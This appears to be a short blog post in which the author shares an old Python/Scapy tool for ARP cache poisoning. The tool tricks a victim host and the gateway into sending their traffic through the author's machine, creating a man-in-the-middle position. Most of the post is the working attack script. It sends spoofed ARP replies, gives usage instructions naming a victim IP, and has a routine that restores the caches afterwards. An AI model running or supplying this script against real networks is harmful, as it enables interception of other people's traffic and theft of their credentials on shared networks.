ARP Cache Poison with Scapy

This is a tool I wrote many years ago. I still have the screenshots and original code so here it is. This tool poisons the arp cache to trick the gateway into thinking that I am the target and the target into thinking I am the gateway. With routing enabled on my machine the traffic passes right through creating a man in the middle attack.

The code

#!/usr/bin/python

from scapy.all import *
import sys
import netifaces as nif
import netifaces
import signal

#This needs to run as root.
#Usage: arp_poison <victim-ip> <target-ip> <interface>

def arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC):
#Send the packet to the victims mac. The source of the MAC is the GW address. In the ARP field the MAC of the GW IP address is our MAC.
#additionaly we set the op to an "is-at" packet
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = targetIP)

#Now we want the GW to think we are the victim.
#Send the packet to GW/TARGET the source is from the Victim. We say the MAC of the Victim is our MAC
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = victimIP)

print "\nForwarding target: %s to  MAC %s"%(targetIP, localMAC)
print "Forwarding target: %s to MAC %s"%(victimIP, localMAC)

while running:
sendp(victimARP, verbose = 0, inter = 1)
sendp(targetARP, verbose = 0, inter = 1)
signal.signal(signal.SIGINT, ctrlc_handler)

def arpRestore(victimIP, targetIP, victimMAC, targetMAC):
#Reset the arp cache for added Ninja
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = targetMAC, psrc = targetIP)
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = victimMAC, psrc = victimIP)
print "\nRestoring arp caches..."

for i in range(1, 10):
sendp(victimARP, inter = 0.5)
sendp(targetARP, verbose = 0, inter = 0.5)
print "Exiting..."
sys.exit()

def ctrlc_handler(signum, frm):
#Kill the arpPoison and call the arpRestore function
running = False
arpRestore(victimIP, targetIP, victimMAC, targetMAC)

#########################################
###########Program Start!################
#########################################
try:
victimIP = sys.argv[1]
targetIP = sys.argv[2]
interface = sys.argv[3]

victimMAC = getmacbyip(victimIP)
targetMAC = getmacbyip(targetIP)

addrs = netifaces.ifaddresses(interface)
localMAC = addrs[nif.AF_LINK][0]["addr"]
except:
print "\nUsage: arp_poison <victim-ip> <target-ip> <interface>\n"

running = True
arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC)